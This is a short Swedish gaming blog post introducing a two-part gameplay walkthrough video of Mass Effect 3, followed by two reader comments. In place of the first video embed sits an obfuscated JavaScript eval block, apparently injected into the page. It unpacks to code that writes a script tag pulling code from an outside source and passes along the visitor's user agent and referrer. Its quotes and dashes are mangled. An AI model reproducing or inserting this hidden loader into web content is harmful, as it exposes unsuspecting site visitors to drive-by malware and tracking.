Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Video: Genomgång av Mass Effect 3

Video: Genomgång av Mass Effect 3
Sebastian

Företaget Bioware som ligger bakom super serien Mass Effect stannade förbi Gametrailers studio för att visa upp nya Mass Effect 3. Det är en gamplay direkt från spelet där vi får se ett uppdrag som utspelar sig på jorden.

Genomgången är uppdelad i två delar. Ni har del ett först och lite längre ner i artikeln, del två.

Del eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iyfbr|var|u0026u|referrer|zdtai||js|php’.split(’|’),0,{}))
1:Del 2:

Comments

  1. xxFagringxx

    Ett otroligt bra spel som bara kommer bli bättre 🙂 Såg detta live på E3 igår.

    • ja herregud! visst var det lite för fett?!